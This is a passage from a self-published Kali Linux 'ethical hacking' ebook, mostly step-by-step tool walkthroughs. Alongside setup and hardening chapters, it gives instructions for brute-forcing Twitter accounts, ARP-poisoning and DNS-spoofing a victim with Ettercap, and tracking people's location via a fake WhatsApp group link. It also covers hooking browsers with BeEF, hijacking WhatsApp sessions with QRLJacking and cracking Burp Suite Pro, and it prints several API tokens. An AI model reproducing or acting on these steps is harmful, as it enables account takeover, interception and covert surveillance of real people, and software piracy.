1

https://www.kakarstore.com/

https://twitter.com/wali_khan_kakar

https://www.instagram.com/walikhankakaro/
 3

Kakar Ethical Hacking eBook

Buy on Amazon and Daraz:

Link: https://www.kakarstore.com/kakartech-
ethical-hacking-ebook/

Kakar Termux Ethical Hacking eBook

Buy on Amazon and Daraz:

Link:
https://www.daraz.pk/products/i392485427.ht
ml?spm=a1zawk.23436738.content_wrap.6.63f
04edfAdk3jP
 4

Contents
Kakar Ethical Hacking eBook .............................. 3
Kakar Termux Ethical Hacking eBook ................. 3
Disclaimer! ........................................................ 14
Warning! ........................................................... 15
How to install Oracle VM VirtualBox ................ 16
How to install Kali Linux.................................... 18
Kali Linux Update and Upgrade ........................ 25
Kali Linux commands ........................................ 27
What are Daemons in Linux? & How to Run
Daemon Process ............................................... 37
How to Install Tor Browser in Kali Linux ........... 39
Twitter Brute force (tweetshell)....................... 41
Find All Social Media Accounts Using a Single
Username ......................................................... 43
How to find website vulnerabilities in Kali Linux
.......................................................................... 47
 5

session is not supported. ($XAUTHORITY is

/home/kali/. Xauth ority which is owned by kali.)
.......................................................................... 51
How to secure Web server from hackers. ....... 53
Dark Web Installation ....................................... 55
How to Crate Dark Web Website ..................... 60
Linux Security: Securing Linux using UFW
(Uncomplicated Firewall) ................................. 65
Nmap ................................................................ 67
Firewall Bypass How to Do No-Ping Scan with
NMAP ................................................................ 70
Network Hacking using NMAP Scanning .......... 71
Kali Linux login bypass ...................................... 75
DNS Spoofing .................................................... 77
Apache2 Server................................................. 84
If not work try this code ................................. 85
HoneyPot .......................................................... 86
 6

Track Location (Seeker) .................................... 89

Ngrok Installation ........................................... 101
Browser Hacking using BeEF (Browser
Exploitation Framework) ................................ 105
Exif Tool (Information Gathering Tool) .......... 114
How to Secure Your Systems and Servers | WAF
and OWASP ..................................................... 115
Capturing and Analyzing Network Packets with
Wireshark........................................................ 118
Install Hacking Scripts, Tools, and Wordlists .. 119
Initramfs Problem ........................................... 131
Increase Internet Speed in Kali Linux ............. 133
NetBIOS Enumeration | How to Perform
Enumeration of NetBIOS ................................ 136
Install Metasploitable 2 on Virtual Machine .. 137
Bash Shell Scripting: Intro to File and
permissions ..................................................... 141
Email Footprinting .......................................... 143
 7

Bug Bounty ..................................................... 145

Website Footprinting ..................................... 148

Subdomains Enumeration .............................. 155

Footprinting Techniques (DNS, WHOIS) ........ 158
Facebook Information Gathering ................... 160
Scan WordPress Vulnerabilities ..................... 162
Fraud Exposed | How to Expose a Scammer . 164
How to Hack WhatsApp QRL Jacking Exploitation
Framework in Kali Linux ................................. 165
How to Hack Webcam, Microphone and get
Mobile Location using a Link .......................... 171
DNS Enumerate .............................................. 178
How to Enumerate SNMP .............................. 179
Web Cam Hacking using CamPhish ................ 183
NIKTO Web vulnerability scanner tool for Kali
Linux ................................................................ 186
Practically Perform Vulnerability Assessment 187
 8

MAC Changer in Shell Scripting ...................... 190

How to Enumerate NetBIOS ........................... 197
How to Enumerate NFS (Network File System)
........................................................................ 200
E: dpkg was interrupted, you must manually run
'sudo dpkg --configure -a' to correct the
problem. ......................................................... 202
Shared Clipboard Text Windows to kali Linux
host in Virtual Box | Copy, and Paste Windows
to Kali Linux..................................................... 203
How to avoid anonymity leaks? Stay anonymous
........................................................................ 205
Remotely Control an Android Device ............. 209

domain using OSiNT Tool ............................... 210

How to Create a Remote Access Trojan (RAT)
........................................................................ 211
Enumeration - How to Enumerate SMTP ....... 213
 9

How to Change Private IP using shell Program

........................................................................ 215
Clear All Logs from Windows and Linux ......... 221
Monitor Mode Switcher Using Shell Scripting223
How to Remove Rootkits from Our Devices .. 226
Advanced Hacking with Nmap ....................... 227
How to Remove Cache Files ........................... 228
How to Create Payload ................................... 229
How Hackers Hack Your Phone Remotely...... 233
How to Perform DoS Attack ........................... 239
Install and use GR-GSM .................................. 240
Password Protect GRUB Boot Loader ............ 244
What is Podman? Use Kali Linux on Windows 11
........................................................................ 248
How Hackers can own your system ............... 250
CSI Installation | A Perfect OS for Cyber Security
and Cyber Crime Investigation ....................... 255
Setup Web Pentesting Lab for Bug Hunting .. 257
 10

How to Perform DDoS Attacks ....................... 260

Sock Puppet hackers technique for OSINT . 261
How to install Spiderfoot................................ 264
How to find social media accounts by username
........................................................................ 266
Mapping Social Media Profiles with Facial
Recognition using Social Mapper ................... 268
Trape: easily track location, IP, OS, Browser of
people, and browser hooking ........................ 271
Recon-ng Web Reconnaissance Framework |
Trace location, Pushpin, Images ..................... 273
HTTrack website copier: How to clone any
website | extract website data ...................... 275
How to easily setup web Pentesting lab on
localhost for bug bounty ................................ 276
Hollywood-style terminal emulator ............... 279
Fully Anonymize Your System with Tor Network
Gateway using Nipe ........................................ 282
 11

METADATA (Hidden information of website

download public documents) ......................... 284
Create a static name for the dynamic IP address
for access localhost from anywhere .............. 285
Host your own fast OSiNT username search
web-server ...................................................... 292
Social Engineering Toolkit (SET) ..................... 295
Discover and extract hostnames of target IP
addresses ........................................................ 296
Information Gathering | DNS-ENUM ............. 298
Information gathering | DNS-RECON ............. 300
Information Gathering | IDS and IPS
Identification lbd ......................................... 302
Information Gathering | IDS and IPS
Identification - wafw00f ................................. 304

dmitry ............................................................. 306

Website nameserver information nslookup .. 307
 12

whois lookup................................................... 308

Metasploit....................................................... 309
Hydra .............................................................. 311
What is the Payload ........................................ 312
Bettercap Framework..................................... 337
How to investigate an Email ID ...................... 345
Netcat | Swiss army knife of hacking tools .... 349
Master of hacker tool to perfect scan any
website | Masscan ......................................... 350
Mobile Security Framework ........................... 352
...... 354
Easily expose your localhost services to the
internet ........................................................... 360
Stay Anonymous online like a pro .................. 362
Twitter OSINT (Open Source Investigation) ... 371
Breaking SERVER Systems using MySQL ........ 373
Cmatrix............................................................ 378
Show Neofetch on Kali Linux Terminal .......... 379
 13

How Hackers Exploit SSH to Hack Your System?

| System Hacking using SSH ........................... 381
How Hackers Remotely Hack Any Device using
FTP .................................................................. 388
Hack Systems: How to use Netcat Commands
with Examples? ............................................... 393
 14

Disclaimer!

This book is only for educational purposes.

This book promotes only cybersecurity
knowledge.
We are not responsible for any legal activities so
Kali Linux for illegal or Black
Hat Hacking activities.
 15

Warning!

This publication is in copyright. Subject to

statutory exception and the provisions of
relevant collective licensing agreements, no
reproduction of any part may take place without
the written permission of book author Wali
Khan Kakar
Published: 2022
Book Author: Wali Khan Kakar
Gmail: walikhankakar313@gmail.com
 16

How to install Oracle VM VirtualBox

1: Visit Oracle official website.

2: Then click to Download.

3: Know Download Windows hosts.

 17

4: Install Microsoft Visual C++.

Website: https://learn.microsoft.com/en-
US/cpp/windows/latest-supported-vc-
redist?view=msvc-170
 18

How to install Kali Linux

1: Visit kali Linux official website.

2: Click on Download.
 19

3: Install the Kali Linux Installer file.

 20

4: Download Installer

5: Or download VirtualBox.

6: Open Oracle VM Virtual Box manager.

7: Create a new machine.

 21

8: Follow the same sitting below the picture.

9: Select Kali Linux ISO Image file.

 22

10: Next, Next, Next.

11: Start Kali Linux.

12: Wi-Fi USB sitting below picture.

 23

13: Go to Graphical Install.

14: Follow the same it is.

 24

15: Click on Yes.

16: Follow the same sitting.

 25

Kali Linux Update and Upgrade

1: Open the Kali Linux machine.

2: Open the Terminal and type.

Command: apt-get update
 26

3: Know Upgrade Kali Linux.

Command: apt-get upgrade
 27

Kali Linux commands

1: How to check IP Address in Kali Linux.

Command: ifconfig

2: Know your Kali Linux name.

 28

Command: uname

3: How to check the kali Linux command which

you enter?
Command: history
 29

4: How do checklists in kali Linux?

Command: ls
Command: ls -la
Command: ls -l
 30

5: How to go back to Kali Linux?

Command: cd ..

6: How to create a file in kali Linux?

Command: touch (File name)
Example: kakarstore.txt
 31

7: How to remove Files from kali Linux?

Command: rm kakarstore

8: How to create a folder in kali Linux?

Command: mkdir (Folder name)
Example: mkdir kakarstore
 32

9: How to remove a folder in kali Linux?

Command: rmdir (Folder name)

10: How to copy files in Kali Linux?

Command: cp (file name) /home/
 33

11: How to check File, and Folder permissions in

Kali Linux?
Command: ls -l File, Folder name
 34

12: Change Directory.

Command: cd Desktop

13: Check kali Linux information.

Install: neofetch
Command: cat /etc/os-release

14: Kali Linux text editor.

Install: gedit

15: Kali Linux copy command.

Command: cp (File name)
Example: cp kakarstore

16: Clear the Kali Linux terminal.

 35

Command: clear

17: Move Kali Linux files.

Command: mv (Files Name)
Example: mv kakarstore

18: Open a file in the kali Linux text editor.

Command: gedit (File Name)
Example: gedit kakarstore.txt

19: How to show file content in Kali Linux.

command: cat (File Name)
Example: cat kakarstore.txt

20: How to remove directories from Kali Linux.

 36

Command: rm -rf (Directory Name)

Example: rm -rf kakarstore
 37

What are Daemons in Linux? & How to

Run Daemon Process

What is Daemon?
1. Program with a unique purpose
2. Utility Programs
3. Run silently in the background
4. Monitor and take care
5. Subsystems of Systemd with ending d
(smtpd)

1: Check Daemon.
Code: ps -aux
38
 39

How to Install Tor Browser in Kali Linux

1: Install the Tor browser.

Command: sudo apt install torbrowser-launcher
-y
Command: sudo apt install -y tor torbrowser-
launcher

2: Launch the Tor browser.

Code: torbrowser-launcher
 40

3: Connect.

4: Start tor service.

Code: sudo service tor start
 41

Twitter Brute force (tweetshell)

1: Clone tweetshell.
Code: git clone
https://github.com/Mehran/tweetshell.git

2:cd tweetshell/

3: chmod +x tweetshell.sh

4: Run tweetshell.
Code: ./tweetshell.sh

5: Start service Tor.

Code: service tor start
42
 43

Find All Social Media Accounts Using a

Single Username

1: Install Userrecon.
Code: git clone
https://github.com/issamelferkh/userrecon.git

2: Go to the userrecon directory.

Code: cd userrecon

3: First check the userrecon list.

Command: ls
 44

4: Give permissions to userrecon.

Code: chmod +x userrecon.sh

5: Start the userrecon.

command: ./userrecon.sh

6: Put username.
Code: kakarstore
 45

7: Userrecon searching elonmusk social

media information.
 46

8: Open the userrecon scan file.

Code: nano kakarstore.txt
 47

How to find website vulnerabilities in

Kali Linux

1: Install Uniscan.
Code: uniscan

2: Take website details.

Code: uniscan -u https://www.kakarstore.com

3: Go to the report folder.

Code: cd /usr/share/uniscan/report/
 48

4: For more details. Code: uniscan -u

https://www.website.com -hufbqwedsriogj

5: Check the report folder.

Code: ls

6: Open the website data file.

Code: firefox www.websitename.com

7: Remove Files.
Code: rm ../sites.txt

8: For Bing search.

Code: uniscan -i

9: Bing scans files.

 49

Code: cat ../sites.txt

10: Open files.

Code: leafpad ../sites.txt

11: For UI.

Code: uniscan-gui
50
 51

Running firefox as root

session is not supported.
($XAUTHORITY is /home/kali/. Xauth
ority which is owned by kali.)

1: Check tor status.

Code: service tor status

2: Start tor service.

Code: service tor start

3: Change ownership.
Code: chown root:root /home/kali/.Xauthority

4: Open files in firefox.

Code: firefox www.website.com.html
52
 53

How to secure Web server from hackers.

1: Install Libapache2.
Command: apt install libapache2-mod-security2

2: cp /etc/modsecurity/modsecurity.comf-
recommended
/etc/modsecurity/modsecurity.conf

3: cd /etc/modsecurity

4: ls
 54

5: nano modsecurity.conf

6: service apache2 restart

 55

Dark Web Installation

1: pip3 install onionsearch

2: sudo apt install tor

3: sudo service tor start

4: onion search output

filename.txt

OR---

1: Install Tor Browser for Linux.

Website:
https://www.torproject.org/download/
 56

2: Go to the Downloads directory where Tor

Browser is downloaded.
Code: cd Downloads

3: Go to the Download directory and extract the

tor browser file manually.
 57

4: Go to tor-browser_en-US
Code: cd tor-browser_en-US

5: Go to the Tor Browser directory tor-

browser_en-US and install all tor browsers
directly.
 58

6: Start tor browser.

7: You can find Dark Web websites on the

Hidden Wiki website.
Website: https://thehiddenwiki.org/
59
 60

How to Crate Dark Web Website

1: Install tor.
Code: apt install tor

2: Start the apache2 server.

Code: service apache2 start

3: Open localhost in the browser.

Code: localhost

4: Go to the tor configuration file.

Code: cd /etc/tor

5: Check tor lists.

 61

Code: ls

6: Open the torrc file.

Code: nano torrc

7: Find the Hidden directory and port.

8: Remove Hash from Hidden files.

 62

9: Save the file.

Code: Ctrl + s

10: Exit the file.

Code: Ctrl + x

11: Start tor.

Code: tor

12: Go to the tor file directory.

Code: cd /var/lib/tor/hidden_service

13: Check the hostname file.

Code: ls
 63

14: Open hostname.

Code: cat hostname

15: Copy the onion link and paste it into the tor
browser to check it how works.
Code:
7hel77fqrg53wbl3bmzwrhffomuh5xwbujlrwfe7
o62zbuu5tprghhyd.onion
 64

16: If tor does not start paste this code in the

terminal.
Code: service tor start
 65

Linux Security: Securing Linux using

UFW (Uncomplicated Firewall)

1: apt install ufw

2: ufw default deny incoming

3: ufw enable
 66

4: ufw status verbose

 67

Nmap

1: Install Nmap.
Command: sudo apt-get install nmap

2: Website details.
Command: nmap google.com

3: Scan random targets.

Command: nmap -iR 4

4: Random targets IP.

IP: 200.8.223.39
 68

5: Port scanning random targets IP.

Command: nmap -sS 200.8.223.39

5: How to go in Port.
Command: nc 200.8.223.39 135

6: Check Version.
Command: nmap -sV 185.151.30.175

7: Website information gathering.

Command: ipcalc 185.151.30.175
 69

8: Scan Network IP.

Command: nmap 185.151.30.0/24

9: Fast scanning.
Command: nmap -F 185.151.30.0/24

10: UDP Scanning.

Command: nmap -sU 185.151.30.175
 70

Firewall Bypass How to Do No-Ping

Scan with NMAP

1: Scan system IP.

Code: nmap -Pn 192.168.50.8-255 -p 1-65535 -v
 71

Network Hacking using NMAP Scanning

1: Scan IP Address.
Code: nmap -sT -T4 -sV -v -O -p 1-65535
192.168.84.129 -oX hackers.xml

2: Check the hackers.xml file.

Code: ls

3: Convert XML file into HTML.

Code: xsltproc hackers.xml -o hackers.html

4: Check the HTML file.

Code: ls
 72

5: Run the hackers.html file, firefox does not run

in the root directory.

6: Exit from the root directory.

Code: exit

7: Open the hackers.html file.

Code: firefox hackers.html

8: Nmap scan report.

 73

9: Scan script.
Code: nmap -sT -T4 -sV -p 1-65535 -O -v -sC
192.168.43.235 -oX scripttech.xml

10: Check the scriptech.xml file.

Code: ls

11: Convert scripttech.xml file into html.

Code: xsltproc scripttech.xml -o scripttech.html

12: Check scripttech.html file.

Code: ls

13: exit the root directory.

Code: exit
 74

14: Open scripttech.html file.

Code: firefox scripttech.html
 75

Kali Linux login bypass

1: Open Kali then enter E.

2: Find Linux and delete ro quiet splash or rw

quite splash init=/bin/bash

3: Write rw init=/bin/bash

4: Run.
Code: ctrl + x
 76

5: Screen look like?

6: You can change Kali old password.

Code: passwd root

7: Check passwords.
Code: cat /etc/shadow
 77

DNS Spoofing

1: Open the Ettercap configuration file.

Code: leafpad /etc/ettercap/etter/conf

2: Remove hash from redir and save (iptables).

 78

3: Start apache2 service.

Code: service apache2 start

4: Check your Kali Linux IP.

Code: ifconfig
 79

5: Create configuration.
Code: leafpad /etc/ettercap/etter.dns

6: save the file.

7: Open ettercap.
Code: ettercap -G
8: Select eth0.

9: Stop the sniffing.

 80

10: Set target (Current target)

11: Scan host (Scan for hosts)

12: Check the Hosts list.

 81

13: Add 192.168.43.1 (Add to Target 2)

14: Add victim ip in Target 1 (192.168.49.234)

15: Go to the Man in the Middle (MITM) and

select ARP Poisoning.

16: Select sniff remote connections.

 82

17: Go to Plugins and select Manage plugins.

18: Activate dns spoof.

 83

19: Start sniffing.

 84

Apache2 Server

1: Install apache2.
Code: sudo apt-get install apache2

2: Check whether apache2 install or not.

Code: apt list installed apache2

3: Start the apache2 server.

Code: sudo service apache2 start

4: Check apache2 status.

Code: service apache2 status

Apache2 starting problem

 85

1: Install this code.

Command: sudo apt-get purge apache2
Command: sudo apt-get install apache2

If not work try this code

1: sudo apt-get -o DPkg::Options::="--force-

confmiss" --reinstall install apache2
2: apt-get purge libapache2-mod-php5 php5
3: apt-get install libapache2-mod-php5 php5
 86

HoneyPot

1: Install White Hat Panda.

Code: git clone
https://github.com/H4CK3RT3CH/pentbox-
1.8.git

2: Go to the Pentbox directory.

Code: cd pentbox-1.8/

3: Run Pentbox.
Code: ./pentbox.rb
87
 88

4: Network tools Honeypot.

5: Use kali Linux IP (ifconfig)

6: Ctlr = c (For exit)

 89

Track Location (Seeker)

1: Install Seeker.
Code: git clone
https://github.com/thewhiteh4t/seeker.git

2: Download Ngrok for Kali Linux.

3: Extract the Ngrok-v3-stable file.

4: Give permissions to Ngrok.

 90

Code: chmod +x Ngrok

5: Copy the Ngrok token Past in Kali Linux.

Code: ./ ngrok config add-authtoken
1vnrtKhM3aDeq3Lx0gp3aX0APeJ_aXJrynxnhdN
mQerBn800

6: Go to the seeker directory.

Code: cd seeker
 91

7: Update and Upgrade Kali Linux.

Code: apt update && apt upgrade

8: Install Python3.
Code: apt install python3 python-pip php

9: Install requirements.
Code: pip3 install requests

10: Run Seeker.

Code: python3 seeker.py
 92

11: Select 0.

12: Run Ngrok.

Code: ./ngrok http 8080
 93

1: Go to the seeker directory.

Code: cd seeker

2: Permit to install.sh.
Code: chmod +x install.sh

3: Run the install.sh.

Code: ./instasll.sh

4: Seeker help.
Code: ./seeker.py -h

5: Run seeker.
Code: ./seeker.py
 94

6: Create a fake WhatsApp group.

Code: 2
7: Give a name to a fake WhatsApp group.
Code: Ethical Hacker

8: Move your logo direct into the seeker folder

and use just a logo name.
Code: Ethical Hacker

9: Logo size will be 300x300.

10: If Moving logo permission is denied the in

seeker folder.
Code: chmod +777 seeker
 95

11: If you want to use this out of kali Linux so

used ngrok, Cloudflare docs server.

12: Create a Cloudflare doc account.

Website: https://dash.cloudflare.com/sign-up

13: Clone cloudflare doc.

Code: git clone
https://github.com/cloudflare/cloudflared.git

14: Install cloudflared-linux-amd64.

Code: wget -q
https://github.com/cloudflare/cloudflared/relea
ses/latest/download/cloudflared-linux-
amd64.deb && dpkg -i cloudflared-linux-
amd64.deb
 96

15: Extract the cloudflared-linux-amd64.deb file.

16: Go to the cloudflared-linux-amd64 directory.

Code: cd cloudflared-linux-amd64

17: Check the usr folder.

Code: ls

18: Go to the usr directory.

Code: cd usr

19: Check the bin directory.

Code: ls

20: Go to the bin directory.

 97

Code: cd bin

21: Run Cloudflare.

Code: ./cloudflared --url 0.0.0.0:8080

22: Here is the to link copy it.

23: Create a Bitly account.

Website: https://app.bitly.com

24: Paste Cloudflare URL into Bitly.

 98

Code: https://miles-warning-crossword-
adventures.trycloudflare.com

25: The link is short now send it to your

WhatsApp try it how it works.
 99

26: You can use Grabipy IP Logger for link

shortness.
Website: https://grabify.link/

27: When you open the link the interface will be

like that.
 100

28: Open Google Maps Link.

 101

Ngrok Installation

1: Create a ngrok account.

2: Copy the link of Download for Linux.

3: Install it.
 102

Code: wget
https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-
v3-stable-windows-amd64.zip

4: Extract the ngrok file.

Code: tar zxvf ngrok-stable-linux-amd64.tgz

5: Copy Connect your account and run it.

Code: ./ ngrok config add-authtoken
1vnrtKhM3aDeq3Lx0gp3aX0APeJ_aXJrynxnhdN
mQerBn423
 103

6: Connect the ngrok server.

Code: ./ngrok http 80

7: Start the Apache2 server.

Code: sudo service apache2 start.

8: Check the apache2 server status.

Code: sudo service apache2 status

9: If you want to restart your ngrok authtoken.

 104

10: Change authtoken in the ngrok file.

Code: sudo nano .config/ngrok/ngrok.yml

11: Remove the old authtoken and paste the

new one.

12: Save the file.

Code: ctrl + o or ctrl + x
 105

Browser Hacking using BeEF (Browser

Exploitation Framework)

1: Go to BeEF website https://beefproject.com

Code: git clone
https://github.com/beefproject/beef.git

2: Go to the beef directory.

Code: cd beef

3: Install script.
Code: ./install
 106

4: Install Bundle.
Code: sudo bundle install

5: Run beef-xss.
Code: beef-xss -h

6: Run beef.
Code: beef

7: Run beef-xss.
Code: beef-xss
 107

8: Run beef.
Code: sudo beef-xss

9: Set a new password for beef.

10: Active ngrok.

Code: ./ngrok http 3000

11: Copy Public IP in ngrok.

 108

Code: 566b-203-81-241------ngrok.io

12: Create Password in config.yaml file.

Code: gedit config.yaml
 109

13: Remove Hash# from public, host, https.

14: Add ngrok forwarding (Public IP) into host ex

566b-203-81-241------ngrok.io

15: Port 443.

 110

16: https true.

17: save it.

18: Go to the demo page here.

19: Go to the advanced demo page.

 111

20: Go to ngrok http 3000 and copy Public IP

Address.
 112

21: Paste the Public IP Address on the advanced

demo page.

1: Install BeEF.
Code: sudo apt-get install beef-xss

2: Start apache2 service.

Code: service apache2 start
 113

3: Go to File System var www html Open

index.html file

Or

Code: /var/www/html
 114

Exif Tool (Information Gathering Tool)

1: Install Exif Tool.

Code: exiftool

2: Exif Tool help.

Code: man exiftool

3: For Information gathering.

Code: exiftool -a -r file, image name
 115

How to Secure Your Systems and Servers

| WAF and OWASP

1: Go to OWASP GitHub.
Code: git clone
https://github.com/SpiderLabs/owasp-
modsecurity-crs.git

2: Run owasp-modsecurity-crs.
Code: cd owasp-modsecurity-crs

3: Move rules.
 116

Code: mv rules /etc/modsecurity/

4: Move crs-setup.conf.example. file.

Code: mv crs-setup.conf.example
/etc/modsecurity/crs-setup.conf

5: Change in apache server.

 117

Code: nano /etc/apache2/mods-

enabled/security2.conf
 118

Capturing and Analyzing Network

Packets with Wireshark

1: Install Wireshark.
Code: wireshark

2: Wireshark is already present in kali Linux

default.
 119

Install Hacking Scripts, Tools, and

Wordlists

1: First update and upgrade kali.

Command: apt-get update
Command: apt-get upgrade

2: Clone discover GitHub.

Code: git clone
https://github.com/leebaird/discover

3: Go to the discover directory.

Code: cd discover/
 120

4: Run update.sh.
Code: ./update.sh

5: Run discover.
Code: ./discover
 121

6: Go to opt directory.
Code: cd /opt
 122

7: Go to the SecLists directory.

Code: cd SecLists/

8: Go to the passwords directory.

Code: cd passwords/

9: Install SecLists.
Code: git clone
https://github.com/danielmiessler/SecLists.git

OR---

1: Download Burpsuite.

2: Unzip Burpsuite.
Code: unzip Burpsuite.zip
 123

3: Go to the Burpsuite directory.

Code: cd Burpsuite/

4: Run the ESEdition.jar file.

Code: java -noverify -jar ESEdition.jar

5: Write your name in licensed to ---.

Code: Kakar

6: Run it.
 124

7: If not Run directly then open a new tab.

8: Open the burpsuite_pro_v1.7.34.jar file.

Code: java -jar burpsuite_pro_v1.7.34.jar

9: Download Java JDK 8 version .deb.

 125

10: Save the file.

11: Open Package.

Code: dpkg -I openlogic-openjdk-jre-8u262-b10-
linux-x64-deb.deb

12: Update alternatives.

Code: update-alternatives config java
 126

13: Select 2.

14: Start Burpsuite.

Code: java -noverify -jar ESEdition.jar

15: Copy the License then paste it into Enter

license key.
 127

16: Next and go to Manual activation.

17: Copy request and paste into Request then

select Response past into Paste response.
 128

18: Next and Finish.

19: Open the same tab.

 129

Code: ctrl + shift + n

20: Run Burpsuite.

Code: ./burp.sh

21: Add Burpsuite in firefox.

OR---

1: Go to the source list directory.

Code: cd /etc/opt

2: Open sources list file.

Code: gedit sources.list
 130

3: Remove Hash # from Number 5.

4: Save it.

5: Update and Upgrade Kali Linux.

Command: apt-get update
Command: apt-get upgrade
 131

Initramfs Problem

1: Check the Problem directory.

Code: blkid

2: Check swap sda5.

Code: fsck /dev/sda5 -y

3: It means swap sda5 is ok.

 132

4: Check sda1.
Code: fsck /dev/sda1 -y

5: sda1 has errors.

6: Restart.
 133

Increase Internet Speed in Kali Linux

1: Choose DNS Server.

Code: sudo mousepad /etc/resolv.conf

2: Change nameservers and Add Google Domain

Name Server.
nameserver: 8.8.8.8
nameserver 8:8:4:4
 134

3: Save the file.

4: Follow this command.

Code: sudo apt-get clean

5: Then do this.
Code: sudo apt-get install apt-transport-https -y

6: Follow this command.

 135

Code: sudo mousepad /etc/apt/sources.list

7: Change HTTP to HTTPS.

8: Save the file.

9: Update Kali Linux.

Code: sudo apt-get update
10: Install any software to check the internet
speed.
 136

NetBIOS Enumeration | How to Perform

Enumeration of NetBIOS

1: Open Metasploitable Machine and check IP

Address.
Code: ifcong

2: Check IP Address.
Code: ping 192.168.1.1

3: Check open Ports.

Code: nmap -sT -T4 -sV -O -p 1-65535 -v
192.185.141.193

4: Check NetBIOS IP.

Code: nbtscan 192.168.92.134 -v
 137

Install Metasploitable 2 on Virtual

Machine

1: First go to Metasploit 2 website.

Website:
https://sourceforge.net/projects/metasploitable
/

2: Download it.
 138

3: Extract the Metasploitable 2 folder.

4: Open Virtual Box and select New.

5: Virtual Box Sitting.

6: 1 GB Ram is enough.

7: Use an existing virtual hard disk file.

 139

8: Select the Metasploitable2 file.

 140

9: Go to setting and Select Bridged adapter.

10: Start it.

11: Metasploitable 2 password is the default.

Command: msfadmin (Login)
Command: msfadmin (Password)
 141

Bash Shell Scripting: Intro to File and

permissions

1: Create a file.
Code: gedit shtest.sh

2: Write something in the file.

3: Save the file.

4: Check the shtest file in the list.

Code: ls
 142

5: Check shtest file permissions.

Code: ls -l

6: Give permission to shtest.sh file.

Code: chmod +x shtest.sh

7: Run shtest.sh file.

Code: ./shtest.sh

8: Check file content.

Code: cat shtest.sh

9: Give permissions as your wish to file.

Code: chmod -rwx shtest.sh
 143

Email Footprinting

1: Open email, Gmail.

2: Go to Show original.
 144

3: Copy to clipboard.

4: Go to the IP2location website.

5: Paste copy to the clipboard into LOOKUP and

check the result below.
 145

Bug Bounty

1: Bug Bounty Jobs website.

Website: https://hackerone.com/

2: Go to Hackers then open Directory.

3: Check Domain tools website.

Website: https://research.domaintools.com/
 146

4: Netcraft.
Website: https://www.netcraft.com/

5: Robtex.
Website: https://www.robtex.com/

6: Find a subdomain for the website and install

knock subdomain tool.
Code: git clone
https://github.com/guelfoweb/knock.git

7: Go to the knock directory.

Code: cd knock

8: Install requirements.
Code: pip3 install -r requirements.txt
 147

9: Find the website domain.

Code: python3 knockpy.py google.com

10: Find website hidden files.

Code: dirb https://www.pcmag.com/picks
website or website pages.

11: Go to the wordlists directory.

Code: cd /usr/share/dirb/
 148

Website Footprinting

1: Open the firefox Extension.

Key: ctrl + shift + a

2: Open firefox and install the Netcraft

extension.
 149

3: Install the Wappalyzer extension.

4: Use Built with the website.

Website: https://builtwith.com
 150

1: Use the subdomain finder website.

Website: https://subdomainfinder.c99.nl/

2: Website Hidden Links.

Code: dirb https://www.google.com/ or website
page link.

3: Dirb GI.
Code: dirbuster
 151

4: Hidden links extensions in firefox.

Link Gopher
 152

Extracts All Links.

5: Use link extractor webtool hub website.

Website:
https://www.webtoolhub.com/tn561364-link-
extractor.aspx

OR---

1: Check security header website.

Website: https://securityheaders.com/

2: Find out the website IP in the Command

prompt.
Code: ping www.google.com
 153

3: Copy the Website IP Address.

4: Website SSL test.

Website: https://www.ssllabs.com/ssltest/

5: Who is look up.

Website: https://whois.domaintools.com/
 154

6: Netcraft.
Website: https://www.netcraft.com/

7:
 155

Subdomains Enumeration

1: Install sublist3r (Subdomains).

Code: git clone
https://github.com/aboul3la/Sublist3r.git

2: Go to the sublist3r directory.

Code: cd Sublist3r

3: Install requirements.txt.
Code: pip install -r requirements.txt

4: Give permissions to sublist3r.py.

Code: chmod +x sublist3r.py
 156

5: Run sublist3r.py.
Code: python3 sublist3r.py

6: Sublist3r help.
Code: python3 sublist3r.py -h

7: Check website subdomains.

Code: python3 sublist3r.py -d kakarstore.com -o
/home/kakar/Desktop/kakarstore.txt
 157

Code: ./sublist3r.py -d kakarstore.com -o

/home/kakar/Desktop/kakarstore.txt

8: Check subdomains in Bing.

Code: python3 sublist3r.py -d kakarstore.com -e
Bing -p 80

Code: ./sublist3r.py -d kakarstore.com -e Bing -p

80
 158

Footprinting Techniques (DNS, WHOIS)

1: Check Website DNS from Dns checker.

Website: https://dnschecker.org/all-dns-
records-of-domain.php

2: Check Whois Domain Lookup.

Website: https://www.whois.com/whois/

3: Check the whois domain name.

Code: whois google.com

4: Check ns look up the website for DNS

records.
Website: https://www.nslookup.io/
 159

5: Check ms look up.

Website: https://mxtoolbox.com/
 160

Facebook Information Gathering

1: Update and Upgrade.

2: Install python2.
Code: apt install git python2

3: xHak9x website.
Website: https://github.com/xHak9x/fbi

4: Go to fbi directory.
Code: cd fbi

5: Install requirements.txt.
Code: pip2 install -r requirements.txt
 161

6: Run fbi.
Code: python2 fbi.py

7: If you want help.

Code: help

8: Generate a token.
Code: token

9: Login into your Facebook id

 162

Scan WordPress Vulnerabilities

1: Scan the WordPress website.

Website: ethicalhack3r.co.uk

2: wpscan help.
Code: wpscan --help

3: Scan the website.

Code: wpscan --url http://ethicalhack3r.co.uk/ --
enumerate ap,at,cb,dbe, -o wpscan.txt

4: Open the wpscan.txt file.

Code: gedit wpscan.txt
 163

5: Check WordPress Plugins vulnerabilities.

Website: https://www.exploit-db.com

6: Scan WordPress full details.

Code: wpscan --url 192.168.10.1 -e u vp --apt-
token nos0chhPBUPxWWMAlAiq

7: Api-token website.
 164

Fraud Exposed | How to Expose a

Scammer

1: Install Fraud-Catcher.
Code:

2: Check Fraud-Catcher in lists.

Code: ls

3: Run Fraud-Catcher.
Code: python3 Fraud-Catcher.py
 165

How to Hack WhatsApp QRL Jacking

Exploitation Framework in Kali Linux

1: Download the latest version of geckodriver.

Website:
https://github.com/mozilla/geckodriver/release
s
 166

2: After installation check the geckodriver in the

Downloads Directory.
Code: cd Downloads
3: Unzip the geckodriver.
Code: tar -xvzf geckodriver-v0.31.0-
linux64.tar.gz

4: Give permissions to geckodriver.

Code: chmod +x geckodriver

5: Follow these Codes.

A: sudo mv -f geckodriver
/usr/local/share/geckodriver
 167

B: sudo ln -s /usr/local/share/geckodriver
/usr/local/bin/geckodriver

C: sudo ln -s /usr/local/share/geckodriver
/usr/bin/geckodriver

6: Git clone geckodriver.

Code: git clone
https://github.com/OWASP/QRLJacking

7: Go to QRL Jacking.
Code: cd QRLJacking

8: Go to QRLJacker.
Code: cd QRLJacker.
 168

9: Install all requirements.

Code: pip install -r requirements.txt --force

10: Run QRLJacker.

Code: python3 QrlJacker.py

11: Check QRLJacker list.

Code: list
 169

12: Use grabber/WhatsApp.

Code: use grabber/whatsapp

13: Options.
Code: options

14: Set Ports.

